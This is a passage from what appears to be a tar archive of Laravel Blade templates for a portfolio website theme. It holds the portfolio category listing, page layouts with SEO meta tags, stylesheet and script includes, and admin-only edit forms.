value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button"> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <h6>{{ $item->title }}<span>{{ $item->description }}</span></h6> </li> @endforeach @unset ($item) </ul> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="sidebar-details-list"> <ul> <li><h6>Project Name<span>Business Card</span></h6></li> <li><h6>Project Category<span>Mockup</span></h6></li> <li><h6>Project Value<span>$150</span></h6></li> <li><h6>Customer<span>ElseColor</span></h6></li> <li><h6>Created Date<span>20 December 2024</span></h6></li> <li><h6>End Date<span>28 December 2024</span></h6></li> </ul> </div> @endif @endif </div> @if(Auth::user()) @can('portfolio check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio-detail.create"> <input type="hidden" name="style" value="{{ $portfolio->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio-detail.create"> <input type="hidden" name="style" value="{{ $portfolio->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2"> <i class="fa fa-edit text-white"></i> {{ __('content.add_portfolio_detail') }} </button> </form> </div> </div> @endcan @endif @if(Auth::user()) @can('portfolio check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <div class="sidebar-widgets"> <h5 class="inner-header-title">{{ __('content.categories') }}</h5> <ul class="sidebar-category-list clearfix"> @foreach ($portfolio_count_categories as $portfolio_count_category) @if (isset($portfolio_count_category->portfolio_category->portfolio_category_slug)) @if (!empty($portfolio_category_index->page_uri)) <li class="@if ($portfolio_count_category->portfolio_category->category_name == $portfolio->category_name) active @endif"><a href="{{ url($portfolio_category_index->page_uri.'/'.$portfolio_count_category->portfolio_category->portfolio_category_slug) }}">{{$portfolio_count_category->portfolio_category->category_name }} <span class="category-count">({{ $portfolio_count_category->category_count }})</span></a></li> @else <li class="@if ($portfolio_count_category->portfolio_category->category_name == $portfolio->category_name) active @endif"><a href="{{ route('default-portfolio-category-index', $portfolio_count_category->portfolio_category->portfolio_category_slug) }}">{{$portfolio_count_category->portfolio_category->category_name }} <span class="category-count">({{ $portfolio_count_category->category_count }})</span></a></li> @endif @endif @endforeach </ul> </div> @if(Auth::user()) @can('portfolio check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio-category.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2"> <i class="fa fa-edit text-white"></i> {{ __('content.add_portfolio_category') }} </button> </form> </div> </div> @endcan @endif @if (count($recent_portfolios) > 0) <div class="sidebar-widgets"> <h5 class="inner-header-title">{{ __('frontend.recent_portfolio') }}</h5> @foreach ($recent_portfolios as $item) <div class="recent-post-item clearfix"> <div class="recent-post-img mr-3"> @if (!empty($item->url)) <a href="{{ $item->url }}"> @if (!empty($item->section_image)) <img src="{{ asset('uploads/img/portfolio/'.$item->section_image) }}" class="img-fluid image-size-100" alt="portfolio image"> @else <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" class="img-fluid image-size-100" alt="portfolio image"> @endif </a> @else <a href="{{ route('default-portfolio-detail-show', ['portfolio_slug' => $item->portfolio_slug]) }}"> @if (!empty($item->section_image)) <img src="{{ asset('uploads/img/portfolio/'.$item->section_image) }}" class="img-fluid image-size-100" alt="portfolio image"> @else <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" class="img-fluid image-size-100" alt="portfolio image"> @endif </a> @endif </div> <div class="recent-post-body"> @if (!empty($portfolio_detail_show->page_uri)) <a href="{{ url($portfolio_detail_show->page_uri.'/'.$item->portfolio_slug) }}"> <h6 class="recent-post-title">{{ $item->title }}</h6> </a> @else <a href="{{ route('default-portfolio-detail-show', ['portfolio_slug' => $item->portfolio_slug]) }}"> <h6 class="recent-post-title">{{ $item->title }}</h6> </a> @endif <p class="recent-post-date"><i class="far fa-calendar-alt"></i>{{ Carbon\Carbon::parse($item->created_at)->isoFormat('DD') }} {{ Carbon\Carbon::parse($item->created_at)->isoFormat('MMMM') }} {{ Carbon\Carbon::parse($item->created_at)->isoFormat('GGGG') }}</p> </div> </div> @endforeach </div> @endif <div class="sidebar-widgets"> <h5 class="inner-header-title">{{ __('frontend.copy_link_and_share') }}</h5> <ul class="sidebar-share clearfix"> <li> <div style="display: none;" id="hiddenURLDiv"></div> <a href="#" onclick="copyPageURL(); return false;"><i class="fa fa-link fa-facebook-f"></i></a> </li> </ul> </div> </div> </div> </div> </div> </section> <!--// Portfolio Single Section End //--> �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/portfolio/category-index-list.blade.php����������������������������������������������0000644�����������������00000041636�14765366572�0017246 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('portfolio check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// My Works Start //--> <section class="section bg-primary-light"> <div class="container"> @if(Auth::user()) @can('portfolio check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row"> <div class="col-md-12"> @if (is_countable($portfolio_count_categories) && count($portfolio_count_categories) > 0) <div class="text-center mb-5 custom-category-link"> <a href="{{ url($portfolio_index->page_uri) }}" class="mb-2">{{ __('frontend.all_portfolio') }}</a> @foreach ($portfolio_count_categories as $portfolio_count_category) @if (isset($portfolio_count_category->portfolio_category->portfolio_category_slug)) <a class="@if ($category->category_name == $portfolio_count_category->portfolio_category->category_name) current @endif mb-2" href="{{ route('default-portfolio-category-index', $portfolio_count_category->portfolio_category->portfolio_category_slug) }}">{{$portfolio_count_category->portfolio_category->category_name }} ({{ $portfolio_count_category->category_count }})</a> @endif @endforeach @unset ($portfolio_count_category) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="text-center mb-5 custom-category-link"> <a href="#" class="link-dark">Creative</a> <a href="#" class="link-secondary">Business</a> <a href="#" class="link-secondary">UI / UX Design</a> <a href="#" class="link-secondary">Marketing</a> </div> @endif @endif </div> </div> @if (is_countable($portfolios_paginate_style) && count($portfolios_paginate_style) > 0) <div class="row portfolio-grid" id="portfolio-masonry-wrap"> @foreach ($portfolios_paginate_style as $item) <div class="col-md-6 col-lg-4 portfolio-item {{ $item->portfolio_category->portfolio_category_slug }}"> @if(Auth::user()) @can('portfolio check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="portfolio-item-inner"> @if (!empty($item->section_image)) <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/portfolio/'.$item->section_image) }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/portfolio/'.$item->section_image) }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> @endif <div class="body"> <div class="portfolio-details"> <span>{{ $item->portfolio_category->category_name }}</span> <h5>{{ $item->title }}</h5> </div> @if (!empty($item->url)) <a href="{{ $item->url }}" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> @else <a href="{{ route('default-portfolio-detail-show', ['slug' => $item->portfolio_slug]) }}" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> @endif </div> </div> </div> @endforeach @unset ($item) </div> <div class="row mt-5"> <div class="col-xl-12"> <div class="easier-pagination-container"> {{ $portfolios_paginate_style->links() }} </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row portfolio-grid" id="portfolio-masonry-wrap"> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Card Mockup</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Mockup Box</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Coffee Mockup</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Square Box</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item ui"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Ui Design</span> <h5>Paper Design</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Business Card</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> </div> @endif @endif </div> </section> <!--// My Works End //--> @if(Auth::user()) @can('portfolio check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio.index"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"><i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }}</button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"><i class="fa fa-plus text-white"></i> {{ __('content.add_portfolio') }}</button> </form> </div> </div> @endcan @endif ��������������������������������������������������������������������������������������������������views/frontend/portfolio/category-index.blade.php���������������������������������������������������0000644�����������������00000024714�14765366572�0016273 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar" @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) class="rtl-mode" @endif @elseif (isset($language)) @if ($language->direction == 1) class="rtl-mode" @endif @endif > <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> @include('frontend.sections.breadcrumb.breadcrumb-style1') @include('frontend.portfolio.category-index-list') @include('frontend.sections.footer.footer-style1') </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> ����������������������������������������������������views/frontend/portfolio/show.blade.php�������������������������������������������������������������0000644�����������������00000025326�14765366572�0014331 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($portfolio->title)) {{ $portfolio->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($portfolio->meta_description)) {{ $portfolio->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($portfolio->meta_keyword)) {{ $portfolio->meta_keyword }} @elseif (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($portfolio->title)) {{ $portfolio->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($portfolio->meta_description)) {{ $portfolio->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (!empty($portfolio->title)) {{ $portfolio->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($portfolio->meta_description)) {{ $portfolio->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($portfolio->title)) {{ $portfolio->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar" @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) class="rtl-mode" @endif @elseif (isset($language)) @if ($language->direction == 1) class="rtl-mode" @endif @endif > <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> @include('frontend.sections.breadcrumb.breadcrumb-style1') @include('frontend.portfolio.portfolio-detail-show') @include('frontend.sections.footer.footer-style1') </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ 